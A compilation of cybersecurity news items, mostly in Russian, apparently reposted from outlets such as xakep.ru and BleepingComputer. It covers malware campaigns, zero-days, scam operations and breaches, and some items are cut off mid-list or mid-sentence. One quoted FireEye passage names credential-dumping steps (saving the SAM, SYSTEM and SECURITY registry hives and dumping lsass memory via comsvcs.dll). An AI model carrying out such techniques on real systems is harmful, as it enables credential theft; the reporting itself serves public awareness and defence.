С учетом представленных гособвинителем доказательств суд Советского района г.Минска постановил в отношении Н. обвинительный приговор. На основании ч.1 ст.350 Уголовного кодекса Республики Беларусь ему назначено наказание в виде ограничения свободы на срок 2 года без направления в исправительное учреждение открытого типа.
МВД назвало Telegram лидером по популярности у IT-злоумышленников.
Основным инструментом коммуникации в IT-преступлениях является мессенджер Telegram, об этом заявил Сергей Ерохин, замначальник управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России. Он отметил, что взаимодействие с Telegram затруднено и на практике не осуществляется, так как серверное оборудование и юридическое лицо компании находятся за пределами РФ, в недоступном сегменте.
Он также добавил, что преступления в IT-сфере являются латентными, носят организованный характер и имеют признаки трансграничности. По его словам, только в 2023 году количество тяжких и особо тяжких преступлений в IT-сфере увеличилось на 26%. Он назвал одной из причин актуальности и роста преступности в сфере IT факты использования, передачи, сбора и хранения информации, содержащей персональные данные, а также создание информационных ресурсов, предназначенных для ее хранения или распространения.
«Широко распространено создание и функционирование коммерческих интернет- ресурсов, предназначенных для сбора, накопления скомпрометированных данных, предоставления их доступа на платной основе. Заказчиками выступают, как участники преступных групп, так и недобросовестные сотрудники частных сыскных, коллекторских агентств и иностранных служб», - отметил Ерохин.
В свою очередь, Андрей Свинцов, зампред комитета Госдумы по информационной политике, информационным технологиям и связи, рассказал в беседе с URA.RU, что в Госдуме обсуждают проект блокировки анонимных Telegram-каналов. По его словам, Telegram-каналы в будущем должны будут проходить регистрацию по аналогии с электронными СМИ, то есть получать лицензию, доменное имя, наличие юрлица и раскрывать свои персональные данные в разумных пределах. Свинцов считает, что такая система позволит бороться с вымогательствами, которые часто совершаются через Telegram-каналы. Он добавил, что сейчас принимать закон пока невозможно, так как в России нет механизмов по блокировке отдельных ресурсов.
«Как только она [технология] появится, я думаю, он [закон будет принят]. И администраторы, и владельцы telegram-каналов будут вынуждены раскрыть свои персональные данные в разумных пределах. Это будет, возможно, идти через регистрацию Роскомнадзора. Как некая аналогия с электронными СМИ», - объяснил Андрей Свинцов.
Он напомнил, что ранее попытки ограничить доступ к Telegram приводили к масштабным сбоям и блокировке сотен других сайтов. «Это создавало лихорадку в сети Интернет», - добавил Андрей Свинцов.
sc: t.me/GovInfo/1132
tass.ru/obschestvo/19984855
Исследователи Денис Синегубко и Адриан Стоян обнаружили на десятках сайтов фейковые версии файлов jQuery, имитирующие плагин jQuery Migrate для WordPress, работающий на 7,2 млн сайтов. Такие подделки содержат обфусцированный код для загрузки малвари, и пока неясно, как эти скрипты попадают на страницы скомпрометированных ресурсов.
__https://twitter.com/x/status/1376690495477276674
Чтобы затруднить обнаружение, эти вредоносные файлы заменяют легитимные файлы по адресу ./wp-includes/js/jquery/, где WordPress обычно хранит файлы jQuery. Так, файлы jquery-migrate.js и jquery-migrate.min.js содержат обфусцированный код, дополнительно загружающий странный файл analytics.js с малварью внутри.
Хотя полный масштаб этой проблемы не определен, Синегубко поделился поисковым запросом, который помогает обнаружить более трех десятков страниц, зараженных этим «аналитическим скриптом».
Издание Bleeping Computer пишет, что на самом деле этот скрипт, конечно, не имеет никакого отношения к аналитике. Например, в коде содержатся ссылки на/wp-admin/user-new.php: страницу администрирования WordPress, предназначенную для создания новых пользователей. Более того, код обращается к переменной _wpnonce_create-user, которую WordPress использует для обеспечения защиты от CSRF.

Также «аналитический скрипт» может направлять посетителей на страницы с поддельными опросами, сайты фейковой техподдержки, вынуждать подписаться на спам или загрузить опасные расширения для браузера.
В примерах, которые обнаружили исследователи Bleeping Computer, вредоносные страницы предлагали пользователю разрешить показ уведомлений, якобы чтобы убедиться, что он не робот, или вели на станицы с поддельными опросами, направленным на сбор пользовательских данных.

Источник: xakep.ru/2021/04/01/fake-jquery-migrate/
pammers have inundated the Python Package Index (PyPI) portal and the GitLab source code hosting website with garbage content, flooding both with ads for shady sites and services.
Прокуратура Грузии сообщила, что бывший министр обороны Грузии оказался под следствием. Поводом стало его возможное участие в мошеннической схеме с международным кол-центром, из-за которой жертвы в Европе лишились сбережений.
По данным грузинской прокуратуры, на счета Давида Кезерашвили и двух его родственников, предположительно, поступили незаконные доходы на сумму свыше миллиона долларов.
Кезерашвили занимал пост главы финансовой полиции, а при Михаиле Саакашвили, который был президентом Грузии с 2004 по 2013 год, стал министром обороны. Обвинения Кезерашвили не предъявили.
В расследовании приняли участие правоохранительные органы Грузии и Германии. В ходе работы они выявили четверых подозреваемых, которым предъявили обвинения в «мошенничестве и отмывании денег в составе организованной группы». По данным прокуратуры, один из подозреваемых, предположительно, перечислил деньги Кезерашвили и его родственникам.
«Расследование по этому делу еще продолжается, в том числе с участием наших зарубежных коллег», — сообщили в прокуратуре.
Кезерашвили не ответил на направленные ему по электронной почте вопросы, а представляющая его юридическая фирма отказалась комментировать обвинения.
В четверг полиция ликвидировала в Тбилиси «крупный мошеннический кол-центр», изъяв сотни компьютеров и телефонов, а также транспортные средства и более 800 тысяч долларов наличными. По данным прокуратуры, предполагаемые мошенники действовали как компания Morgan Limited LLC.
В 2020 году OCCRP уже писал о сети кол-центров, опутавшей Грузию, Албанию и Украину, где работала целая армия продавцов, настойчиво предлагавших жертвам по всему миру сомнительные инвестиции. Центры использовали разные названия, в Украине они были известны как Milton Group, а в Грузии — как Morgan Limited.
Они обманывали уязвимых и пожилых людей, заставляя их перечислять мошенникам крупные суммы под видом инвестиций. По оценкам испанской полиции, опубликованным в 2022 году, из-за схемы жертвы потеряли миллиарды евро.
Грузинская прокуратура сообщила, что обезвреженная в четверг преступная группировка выманила у граждан Германии, Словении и Словакии порядка 2,9 миллиона долларов.
Сотрудники кол-центра регистрировали жертв на криптовалютных биржах, а затем переводили купленные ими «виртуальные активы» на цифровые кошельки преступной группировки. При этом жертвам показывали фиктивные платформы, имитирующие рост их инвестиций.
«Когда жертвы требовали вернуть им инвестированные средства или прибыль, с ними прекращали всякое общение», — рассказали в прокуратуре.
В 2013 году Кезерашвили обвинили в получении взяток на сумму 12 миллионов долларов в обмен на то, чтобы он закрыл глаза на контрабанду алкоголя из Украины в Грузию. В итоге с него сняли обвинения, которые, по его словам, имели политическую подоплеку.
• Source: https://pog.gov[.]ge/en/news/saqarTvelos-prokuraturam-germaniis- federaciuli-respublikis-samarTaldamcavebTan-TanamshromlobiT-qol
By

Cisco Duo's security team warns that hackers stole some customers' VoIP and
SMS logs for multi-factor authentication (MFA) messages in a cyberattack on
their telephony provider.
Cisco Duo is a multi-factor authentication and Single Sign-On service used by
corporations to provide secure access to internal networks and corporate
applications.
Duo's homepage reports that it serves 100,000 customers
and handles over a billion authentications monthly, with over 10,000,000
downloads on Google
Play.
In emails sent to customers, Cisco Duo says an unnamed provider who handles
the company's SMS and VOIP multi-factor authentication (MFA) messages was
compromised on April 1, 2024.
The notice explains that a threat actor obtained employee credentials through a phishing attack and then used those credentials to gain access to the telephony provider's systems.
The intruder then downloaded SMS and VoIP MFA message logs associated with specific Duo accounts between March 1, 2024, and March 31, 2024.
"We are writing to inform you of an incident involving one of our Duo telephony suppliers (the "Provider") that Duo uses to send multifactor authentication (MFA) messages via SMS and VOIP to its customers," reads the notice sent to impacted customers.
"Cisco is actively working with the Provider to investigate and address the incident. While the investigation is ongoing, the following is a summary of the incident based on what we have learned to date."
The provider confirmed that the threat actor did not access any contents of the messages or use their access to send messages to customers.
However, the stolen message logs do contain data that could be used in targeted phishing attacks to gain access to sensitive information, such as corporate credentials.
The data contained in these logs includes an employee's:
When the impacted supplier discovered the breach, they invalidated the compromised credentials, analyzed activity logs, and notified Cisco accordingly. Additional security measures were also implemented to prevent similar incidents in the future.
The vendor provided Cisco Duo with all of the exposed message logs, which can be requested by emailing msp@duo.com to help better understand the scope of the breach, its impact, and the appropriate defense strategy to take.
Cisco also warns customers impacted by this breach to be vigilant against potential SMS phishing or social engineering attacks using the stolen information.
"Because the threat actor obtained access to the message logs through a successful social engineering attack on the Provider, please contact your customers with affected users whose phone numbers were contained in the message logs to notify them, without undue delay, of this event and to advise them to be vigilant and report any suspected social engineering attacks to the relevant incident response team or other designated point of contact for such matters," concludes the notification from Cisco's Data Privacy and Incident Response Team.
"Please also consider educating your users on the risks posed by social engineering attacks and investigating any suspicious activity."
The FBI warned last year that threat actors were increasingly using SMS phishing and voice calls in social engineering attacks to breach corporate networks.
In 2022, Uber was breached after a threat actor performed an MFA fatigue attack on an employee and then contacted them on WhatsApp via their phone numbers, pretending to be IT help desk personnel. This eventually led to the target allowing the hackers to log into the account and gain access to Uber's systems.
Cisco has not disclosed the supplier's name and the number of customers impacted by this incident. BleepingComputer contacted Cisco with further questions but a reply was not immediately available.
20 января 2021 года теневое сообщество мира было взбудоражено новостью о взломе одного из известнейших теневых ресурсов Verified. Это громогласное в определённых кругах событие стало отправной точкой в последовавшей цепочке взломов других уважаемых ресурсов даркнета в русскоязычном сегменте. Так, 20 февраля этого года пострадал уже кардинговый форум CrdClub. 2 марта был атакован даркнет-портал Exploit, правда не сообщается, была ли успешной атака. И буквально на следующий день пришли вести об атаках на Maza – один из самых старых русскоязычных форумов.
Эти события, проходящие незаметно для широкой публики, имеют огромное влияние на весь мир. Как известно, хакерские форумы – это не просто набор страниц для общения между киберпреступниками. В первую очередь такие форумы – чёрный рынок, на котором покупается и продаётся различная информация и услуги. Хакеры зарабатывают миллиарды долларов в год на атаках: фишинг, вирусные шифровальщики, кардинг и прочее. Всё это имеет огромное влияние на экономику мира, требуя больших средств на обеспечение кибербезопасности.
Взлому подверглись крупные теневые игроки русскоязычного сегмента, и это происходит на фоне беспрецедентной волны закрытий и захватов зарубежных даркнет-площадок, как занимающихся продажей ПАВ, так и кардинговой и хакерской направленности.
Неясно, связаны ли атаки на русскоязычные площадки с работой спецслужб. Это может быть и борьба между самими хакерскими группировками. Можно сказать одно: результаты этих атак чаще всего были далеко не впечатляющими.
Ни один из атакованных или взломанных форумов не прекратил окончательно свою работу, и не появилось сообщения о закрытии портала правоохранителями. Так, копия портала Verified появилась на новом адресе. На том же Verified появилось сообщение, что всем пользователям администрация успешно сбросила пароли. У Exploit'а навремя атаки была приостановлена работа зеркала в открытом интернете, но и только.
Мелковато для спецслужб, да и для серьёзных хакерских группировок результаты не очень впечатляющие. Так что у русскоязычного кардинг- и хакинг-сообщества есть весомые причины полагать, что спокойные времена для них пока не закончились.
](https://ruonion.com/news/hackers-wars)
hackers-wars
ruonion.com
ИБ-исследователи обнаружили, что Android-банкер Anubis вернулся и теперь нацелен на пользователей 394 приложений, включая продукты финансовых учреждений, криптовалютные кошельки и виртуальные платежные платформы. При этом эксперты компании [Lookout](https://lookout.com/blog/anubis-targets- hundreds-of-financial-apps) пишут, что новая кампания банкера пока находится в стадии тестирования и оптимизации.
Впервые Anubis был замечен на хакерских форумах в 2016 году, когда
распространялся как банковский троян с открытым исходным кодом, снабженный
подробными инструкциями по внедрению клиента и различных компонентов.
В 2019 году малварь обзавелась вымогательским модулем и проникла в Google Play
Store, используя для внедрения поддельные приложения. В 2020 году троян и
вовсе развернул [крупномасштабную фишинговую
кампанию](http://cofense.com/infostealer-keylogger-ransomware-one-anubis-
targets-250-android-applications/), нацеленную на пользователей 250
шоппинговых и банковских приложений.
Принцип работы малвари прост: обычно Anubis отображает фишинговые оверлеи
поверх окон настоящих приложений и ворует введенные пользователями учетные
данные.
Новая версия малвари, замеченная экспертами Lookout, нацелена уже на 394 приложения и обладает следующими возможностями:
Как в прошлых версиях Anubis, малварь определяет, включена ли на взломанном устройстве функция Google Play Protected, после чего отправляет поддельное системное предупреждение, чтобы обманом заставить пользователя отключить ее. Это дает трояну полный доступ к устройству и свободу отправлять и получать данные с управляющего сервера без каких-либо помех.
[](https://xakep.ru/wp- content/uploads/2021/12/368018/disable_play_protect.jpg)
Эксперты сообщают, что на этот раз злоумышленники попытались отправить пакет fr.orange.serviceapp в Google Play Store в июле 2021 года, но тогда их приложение было отклонено. Судя по всему, это была лишь попытка проверить системы Google для защиты от вредоносных программ, поскольку тогда злоумышленники лишь частично реализовали свою схему обфускации.
Пока распространение вредоносного приложения Orange SA, снабженного новой версией Anubis, происходит через сторонние сайты, сообщения в социальных сетях, на форумах и так далее. При этом вредоносная кампания нацелена не только на французских клиентов Orange SA, но и на американских пользователей, включая клиентов Bank of America, US Bank, Capital One, Chase, SunTrust и Wells Fargo.
Учитывая, что код Anubis давно распространяется на многочисленных хакерских форумах, его использует множество хакеров, и теперь понять, кто стоит за новой версией трояна, крайне трудно. К тому же атакующие потрудились скрыть свои следы и используют Cloudflare для перенаправления всего сетевого трафика через SSL, тогда как C&C-сервер маскируется под криптовалютный обменник, используя домен https://quickbitrade[.]com.
[](https://xakep.ru/wp- content/uploads/2021/12/368018/quick_bit_trade.jpg)
source: xakep.ru/2021/12/14/new-anubis
На этой неделе разработчики Google выпустили Chrome версии 89.0.4389.72 для десктопных систем (Windows, Mac и Linux), где исправили уже вторую в этом году уязвимость нулевого дня.
Проблема имеет идентификатор CVE-2021-21166, и инженеры компании предупреждают, что эксплоит для нее уже существует.
Сообщается, что уязвимость была обнаружена экспертами Microsoft Browser Vulnerability Research и описывается как проблема высокой степени серьезности, связанная с «жизненным циклом объектов в аудио».
Больше никаких подробностей о проблеме пока не раскрывают, давая пользователям время на установку патча. И хотя специалистам Google известно о существовании и применении эксплоита для CVE-2021-21166, никаких данных о хакерах, стоящих за этими атаками, тоже не сообщается.
«Доступ к информации об уязвимостях и ссылкам может быть ограничен до тех пор, пока большинство пользователей не установит исправление. Кроме того, если ошибка существует в сторонней библиотеке, от которой аналогичным образом зависят другие проекты, и она еще не исправлена, мы можем придерживаться аналогичных ограничений», — сообщают в Google.
Click to expand...
Источник: xakep.ru/2021/03/03/chrome-0day-3/
Специалисты FireEye предупредили, что хакеры используют для взлома корпоративных сетей и установки бэкдоров три уязвимости нулевого дня в продуктах SonicWall . Эти атаки были обнаружены в марте 2021.
Проблемы затрагивают SonicWall Email Security (SonicWall ES), решение для защиты электронной почты, которое компании используют в облачном или локальном формате для сканирования почтового трафика. Уязвимостям были присвоены следующие идентификаторы: CVE-2021-20021 (CVSS 9,4, обход аутентификации, создание учетной записи администратора), CVE-2021-20023 (CVSS 6,7, чтение локальных файлов) и CVE-2021-20022 (CVSS 6,7, модификация локальных файлов или загрузка веб-шеллов, использующихся как бэкдор).
FireEye отслеживает упомянутую выше хак-группу под кодовым идентификатором UNC2682. Известно, что злоумышленники использовали три уязвимости в различных комбинациях. Как правило, их атаки были направлены на получение доступа к устройству SonicWall ES, чтобы создать новую учетную запись администратора или похитить пароли существующих пользователей. Также злоумышленники извлекали с устройств SonicWall ES файлы, которые содержали подробную информацию о существующих аккаунтах, включая учетные данные Active Directory.
В конце атакующие загружали вариацию веб-шелла BEHINDER JSP на встроенный веб- сервер Tomcat Java, который затем использовался для выполнения команд в базовой ОС. Это позволяло UNC2682 собрать дополнительные сведения о внутренней сети компании.
«Мы наблюдали, как злоумышленники выполняли команду reg save для дампа из реестра HKLM\SAM, HKLM\SYSTEM и HKLM\SECURITY, которые содержат важную информацию для восстановления парольных хэшей и секретов LSA. Кроме того, злоумышленники собирали конфиденциальные учетные данные из памяти с помощью встроенных техник дампа памяти. В частности было замечено, как злоумышленники вызвали MiniDump-экспорт Windows DLL comsvcs.dll для сброса как памяти процесса для lsass.exe, так и запущенного Apache Tomcat», — говорят исследователи.
Click to expand...
Хотя разработчики SonicWall выпустили исправления для уязвимых устройств еще на прошлой неделе, лишь 20 апреля 2021, то есть неделю спустя, компания сообщила, что эти проблемы уже используются хакерами. Из-за этого ИБ-эксперты вновь критикуют SonicWall, заявляя, что компания некорректно реагирует на уязвимости, и не публикует информацию своевременно, чтобы системные администраторы могли расставить приоритеты по установке исправлений.
__https://twitter.com/x/status/1384634293587226628
Источник: xakep.ru/2021/04/22/sonicwall-es-0days/
Аналитики [Volexity](http://www.volexity.com/blog/2024/06/13/disgomoji-
malware-used-to-target-indian-government/?ref=thestack.technology) обнаружили
Linux-малварь DISGOMOJI, которая использует эмодзи для выполнения команд на
зараженных устройствах и в основном атакует правительственные учреждения в
Индии.
Эксперты полагают, что этот вредонос связан с пакистанскими хакерами,
известным под идентификатором UTA0137.
«С высокой степенью вероятности Volexity предполагает, что группа UTA0137 преследует цели, связанные со шпионажем, и нацелена на правительственные организации в Индии. По результатам нашего анализа, кампании UTA0137, судя по всему, были успешными», — рассказывают специалисты.
Click to expand...
В целом DISGOMOJI похожа на многие другие бэкдоры, позволяя злоумышленникам выполнять команды, делать скриншоты, похищать файлы, развертывать дополнительные полезные нагрузки и искать конкретные файлы. Однако от других угроз этого вредоноса отличает использование Discord в качестве управляющего сервера и эмодзи, что позволяет ему обходить защитные системы, которые обычно реагируют на текстовые команды.
Малварь была обнаружена после того, как исследователи заметили в ZIP-архиве исполняемый файл ELF, упакованный с помощью UPX. Предполагается, что этот архив распространялся через фишинговые письма.
В Volexity считают, что вредонос нацелен на кастомный дистрибутив Linux под названием BOSS, который широко используется индийскими правительственными учреждениями. Однако малварь может не менее эффективно использоваться и для атак на другие дистрибутивы.
При запуске вредонос загружает и отображает PDF-документ фальшивку, который связан с выплатой пособий в случае смерти офицера и якобы написан индийским Фондом обеспечения офицеров оборонной службы. При этом в фоновом режиме загружаются дополнительные полезные нагрузки, включая DISGOMOJI и шелл-скрипт под uevent_seqnum.sh, который используется для поиска USB-накопителей и кражи данных с них.
После запуска DISGOMOJI собирает системную информацию о зараженной машине, включая IP-адрес, имя пользователя, имя хоста, данные об операционной системе, которые передаются злоумышленникам. Кроме того, малварь закрепляется на зараженном Linux-устройстве благодаря использованию команды Reboot cron для выполнения при загрузке.
Для управления вредоносом злоумышленники применяют опенсорсный проект discord-c2, который использует Discord и эмодзи для связи с зараженными устройствами и выполнения команд. Так, малварь подключается к контролируемому злоумышленниками серверу Discord и ждет, пока атакующие запостят в канал эмодзи.
«DISGOMOJI прослушивает новые сообщения в управляющем канале на сервере Discord. C2-коммуникации осуществляются по протоколу, основанному на эмодзи, где злоумышленник отправляет команды вредоносному ПО, посылая эмодзи в командный канал (с дополнительными параметрами, если это необходимо). Пока DISGOMOJI обрабатывает команду, он отображает эмодзи “Часы” в сообщении, чтобы сообщить атакующему, что команда обрабатывается. Когда команда полностью обработана, реакция эмодзи “Часы” удаляется, и добавляется эмодзи “Кнопка с галочкой”, чтобы подтвердить, что команда выполнена», — рассказывают исследователи.
Click to expand...
В общей сложности девять эмодзи используются для обозначения разных команд,
выполняемых на зараженном устройстве.

За эксплоитами для уязвимостей 0-day и ранее неизвестное ПО DevilsEye с израильской компанией Candiru.
Специалисты
[Microsoft](https://www.microsoft.com/security/blog/2021/07/15/protecting-
customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-
devilstongue-malware/) и [Citizen Lab](https://citizenlab.ca/2021/07/hooking-
candiru-another-mercenary-spyware-vendor-comes-into-focus/) выявили связь
между израильской компанией Candiru и двумя эксплоитами для уязвимостей
нулевого дня в Windows, использовавшимися для развертывания ранее неизвестного
шпионского ПО на устройствах как минимум сотни жертв, включая политиков,
защитников прав человека, журналистов, ученых, сотрудников посольств и
диссидентов.
Созданная в 2014 году Candiru является частью процветающего израильского рынка
информационной безопасности и специализируется на продаже инструментов для
взлома государственным спецслужбам по всему миру. Хотя о роде ее деятельности
известно уже давно, о самой компании и ее возможностях не было практически
никакой информации, и отчеты Microsoft и Citizen Lab являются первыми, в
которых представлен подробный технический анализ одного из хакерских
инструментов Candiru.
Речь идет об инструменте под названием DevilsEye – вредоносной программе для
Windows с функциями шпионского ПО, обеспечивающей клиентам Candiru полный
доступ к зараженному устройству.
Впервые о существовании DevilsEye узнали исследователи из Citizen Lab при
Университете Торонто. Они наткнулись на него во время проведения экспертизы
устройства «политически активной жертвы в Западной Европе» и передали свою
находку коллегам из Microsoft. Благодаря обширной базе телеметрических данных
компании удалось выявить как минимум сто зараженных DevilsEye устройств в
Палестине, Израиле Иране, Ливане, Йемене, Испании, Великобритании, Турции,
Армении и Сингапуре.
Как сообщает Microsoft, вредонос, как правило, распространялся через сайты с
наборами эксплоитов для уязвимостей в браузерах. Жертву заманивали на эти
сайты, и после эксплуатации уязвимостей на ее устройстве устанавливалось
вредоносное ПО, затем использовавшее эксплоит второго этапа атаки для
получения прав администратора на Windows.
Цепочка атаки была отлично продумана и использовала ранее неизвестные
уязвимости (уязвимости нулевого дня). Сюда входя две уязвимости в Chrome (
CVE-2021-21166 и
CVE-2021-30551 ),
уязвимость в Internet Explorer (
CVE-2021-33742 ), и две
– в Windows (
CVE-2021-31979 и
CVE-2021-33771 ). Все
уязвимости в настоящее время уже исправлены.
Первые три уязвимости были обнаружены специалистами Google, которые на днях
опубликовали отчет о них. В
компании отнесли эксплоиты для уязвимостей в Chrome и IE на счет неназванного
производителя коммерческого ПО для слежки. По данным Google, эксплоиты были
проданы как минимум двум работающим на правительство киберпреступным группам,
которые использовали их в атаках на пользователей в Армении. Позднее
специалисты дополнила свой отчет, сообщив, что компанией, о которой идет речь,
является Candiru.
Как устроено одно из крупнейших мошеннических объединений СНГ и что можно сделать для своей защиты?
В своём недавно опубликованном отчёте специалисты ESET рассказали о группе мошенников «Gipsy Team», которых окрестили «Неандертальцами». Группировка ответственна за разработку и поддержку мошеннического Telegram-бота под названием Telekopye, который помогает киберпреступникам обманывать людей на онлайн-плошадках, направленных на страны СНГ. Бот способен создавать фишинговые сайты, электронные письма, SMS и многое другое.
В августе у ESET уже выходил подробный отчёт касательно Telekopye, который мы также внимательно рассмотрели и сделали краткую выжимку . Однако мошенники не сидят на месте и постоянно эволюционируют, в связи с чем выход второй части расследования не заставил себя долго ждать.
Исследователи ESET изучили методы вербовки новых членов в группировку «Неандертальцев», процесс обучения, а также использование различных схем обмана и других аспектов деятельности злоумышленников, что мы и обсудим ниже, снабдив читателей полезной информацией о том, как распознать онлайн- мошенничество и не стать одной из жертв скаммеров.
«Неандертальцы» набирают новых участников через рекламу в различных каналах, включая подпольные форумы. Там они обещают честные 75% от заработанных средств, стабильную работу на протяжении трёх лет и указывают на высокое качество используемых фишинговых сайтов, полностью повторяющих дизайн оригинальных сайтов Авито, Юлы и СДЭК.
После связи с потенциальным работодателем через Telegram-бота и последующего одобрения заявки — новички получают доступ к групповым чатам и каналам, где хранятся правила и руководства.
В работе Неандертальцев выделяются три основных сценария мошенничества: «продавец», «покупатель» и «возврат средств». Каждый сценарий имеет свои особенности. Например, в случае со сценарием продавца, мошенники предлагают жертвам (так называемым «Мамонтам») какой-то интересный товар по привлекательной цене и перенаправляют их на фишинговый сайт для оплаты.
«В отличие от легитимной веб-страницы, на этой странице запрашивается логин для входа в онлайн-банкинг, данные кредитной карты или другая конфиденциальная информация. Если Мамонт вводит эти данные, фишинговый веб-сайт автоматически их крадёт», — объясняют исследователи ESET.
Интересно отметить, что данные, похищенные с фишинговых сайтов, не становятся доступны конкретному Неандертальцу, ответственному за их добычу. Они попадают в отдельную базу и обрабатываются другими членами группы. Сделано это, вероятно, для достижения максимальной эффективности: каждый злоумышленник занимается исключительно своим делом, сродни небольшому винтику в гигантском механизме.
В сценарии с покупателем, как несложно догадаться, мошенники проявляют интерес к определённому товару, который Мамонт выставил на продажу. Неандерталец инициирует переписку с продавцом, в которой использует социальную инженерию, чтобы завоевать доверие Мамонта, а затем присылает ему фишинговую ссылку с обещанием, что после указания своих банковских реквизитов деньги за товар автоматически зачислятся на счёт продавца.
Сценарий с возвратом денег особенно коварен, так как мошенники могут надурить Мамонта дважды. Сначала притворившись продавцом и получив с жертвы деньги с банковскими данными, а затем прикинувшись службой поддержки площадки, дающей обещание вернуть Мамонту деньги в обмен на очередной переход по фишинговой ссылке, где с жертвы собирается ещё больше личных данных.
Документация «Неандертальцев», используемая как для обучения новичков, так и в качестве шпаргалки для опытных мошенников, включает различные изображения с возможными вариантами переписок, графики, краткие руководства и даже весьма сложные документы.
Потенциальных жертв мошенники обычно находят через веб-скрапперы , экспортируя данные с интересующей их платформы в Excel-таблицу и затем тщательно отбирая Мамонта по ряду ключевых параметров. Так, высокий рейтинг пользователя и большой опыт взаимодействия с площадкой могут свидетельствовать о том, что он с большей вероятностью распознает мошенничество, значит и время на него тратить не стоит.
Согласно рабочему скрипту, Неандертальцам можно стерпеть только определённый уровень сопротивления со стороны Мамонтов. Если мошенники считают, что афера вряд ли увенчается успехом, они быстро находят другую цель. Однако если они ощущают, что почти победили, то всегда стараются дожать жертву, уделяя ей своё полное внимание и убедительно развеивая любые опасения.
По информации выше может показаться, что Неандертальцы нацелены только на СНГ- площадки, хотя это не совсем так. Специалисты ESET обнаружили заготовленные таблицы с переводом различных дежурных фраз с русского на другие популярные языки, из чего следует, что скаммеры работают по всему миру.
Стоит отметить, что Неандертальцы не используют новомодный искусственный интеллект в своих операциях, который может сильно упростить генерацию новых сценариев мошенничества. Группа предпочитает традиционные методы общения и, стоит сказать, выходит довольно удачно.
«Неандертальцы догадываются, что в их группах полно "крыс" (например, сотрудников правоохранительных органов или исследователей). Поэтому они свято придерживаются правил, запрещающих выискивать информацию, которая могла бы идентифицировать других членов группы. Нарушение таких правил вполне может привести к бану», — сообщают исследователи ESET.
В интервью с одним из администраторов Telekopye, проведённом в конце 2020 года и обнаруженным специалистами ESET, высокопоставленный Неандерталец делится своим видением онлайн-мошенничества в будущем и подчёркивает, что несмотря на многочисленные ограничения со стороны платформ, полностью искоренить такого рода мошенничество невозможно, и что существовать оно будет всегда.
Исходя из такой смелой позиции, позволим себе дать ряд определённых рекомендаций, которые смогут обезопасить от мошенничества как вас самих, так и ваших близких:
Надеемся, что благодаря предоставленной информации о методах работы мошенников и вышеперечисленным советам по защите, вы будете чувствовать себя в интернете более безопасно и уверенно. Осторожность и осведомлённость в онлайн- пространстве — ключевые факторы в предотвращении подобных угроз. Помните, что знание — это ваша лучшая защита в борьбе с киберпреступностью.
В крупнейшей в истории Германии операции по борьбе с киберпреступностью, проведённой немецкими правоохранительными органами совместно ФБР, в середине января 2024 года было изъято около 50 000 биткоинов (BTC), что составляет примерно $2,1 млрд..
50 000 BTC – самая крупная сумма, которую спецслужбы Германии когда-либо изымали у преступников. Биткоины были переданы добровольно одним из подозреваемых на специальные кошельки Федерального ведомства по уголовным делам (Bundeskriminalamt, BKA). Однако окончательное решение о дальнейшем использовании криптовалюты ещё не принято.
Расследование продолжается в отношении двух ответственных лиц: 40-летнего гражданина Германии и 37-летнего гражданина Польши, которые подозреваются в незаконном распространении авторских произведений, нарушении авторских прав и последующем отмывании денег. Оба подозреваемых являются ключевыми фигурами крупного немецкого портала movie2k.to, который до конца мая 2013 года занимался распространением пиратского контента. Портал прекратил свою работу в мае 2013 года. Предполагается, что средства, полученные от этой деятельности, в том числе от рекламы на сайте, были конвертированы в биткоины. Подробности расследования не разглашаются до его завершения.
Случай привлек значительное внимание из-за величины изъятых активов и сложности правовых и финансовых последствий. 17 января 2024 года сообщество было взбудоражено сообщениями о переводе около 50 000 биткоинов на счета полиции, что вызвало опасения относительно возможных колебаний рынка.
sc: polizei.sachsen.de/de/MI_2024_103935.htm
Популярная децентрализованная биржа ThorChain, главной особенностью которой является поддержка нескольких блокчейнов, была взломана. Хакерам удалось вывести 4 000 ETH ($7.6 млн).
Изначально предполагалось, что злоумышленники смогли вывести более 13 000 ETH, однако позднее разработчики ThorChain рассказали, что убытки оказались меньшими. Они также подчеркнули, что у них достаточно средств для возмещения убытков пользователям, однако призвали хакеров вернуть средства в обмен на награду за поиск уязвимостей.
«В нашем хранилище есть средства для покрытия украденной суммы, но мы просим злоумышленника связаться с командой, чтобы обсудить возврат средств и вознаграждение, соизмеримое с обнаружением уязвимости», – говорится на официальном Telegram-канале ThorChain.
Хакеры воспользовались уязвимостью в мосте в сеть Эфириума под названием Bifrost. По словам разработчиков, Bifrost очень сложный смарт-контракт, и это позволило хакерам обнаружить и воспользоваться уязвимостью. После взлома основная сеть ThorChain была остановлена. Средства будут возвращены пострадавшим пользователям после исправления ошибки и возобновления работы площадки.
Согласно плану восстановления, разработчики выпустят патч и перезапустят сеть. Затем в пул ликвидности будут зачислены ETH из хранилища ThorChain и запущен автоматический инструмент для проверки правильности выводов. Разработчики пообещали, что проведут аудит безопасности площадки.
Напомним, что основная сеть Chaosnet проекта ThorChain была запущена в апреле этого года. При этом площадку уже взламывали в прошлом месяце, однако тогда злоумышленники украли активы всего на $140 000.
Специалисты компании Coveware подвели итоги четвертого квартала 2020 года и сообщили, что за указанный период получили множество сообщений о том, что шифровальщики уничтожили целые кластеры серверов. Так, вымогатели обычно нацелены на системы резервного копирования и машины важных целей, однако в упомянутых случаях восстанавливать было нечего.
Эксперты говорят, что хакеры, преследующие финансовую выгоду, делают это не специально, ведь после удаления данных у жертв больше нет причин платить взломщикам выкуп и «покупать» таким образом дешифровальщик. Аналитики полагают, что эти инциденты могли быть следствием того, что в последнее время сцену наводнили не особенно квалифицированные злоумышленники. Хуже того, такая тенденция может сохраниться и в 2021 году.
Также статистика Coveware говорит о том, что средний размер выплаченного выкупа в четвертом квартале 2020 года снизился сразу на 34% (154 108 долларов против 233 817 долларов). Если посмотреть на медианное значение, то падение будет еще более значительным: от 110 532 до 49 450 долларов, то есть на 55%.

Отчет компании гласит, что все больше пострадавших компаний говорят «хватит» и предпочитают не платить злоумышленникам, невзирая даже на угрозы последних «слить» похищенные данные в открытый доступ. Дело в том, что в 50-70% случаев атакующие утверждают, что до шифрования файлов они успели похитить информацию у компании-жертвы. Но нередко это ложь, или злоумышленники публикуют украденные данные вне зависимости от того, заплатили им или нет. В итоге этот рычаг давления, похоже, работает все хуже.
Источник: xakep.ru/2021/02/05/ransomware-stats-2/
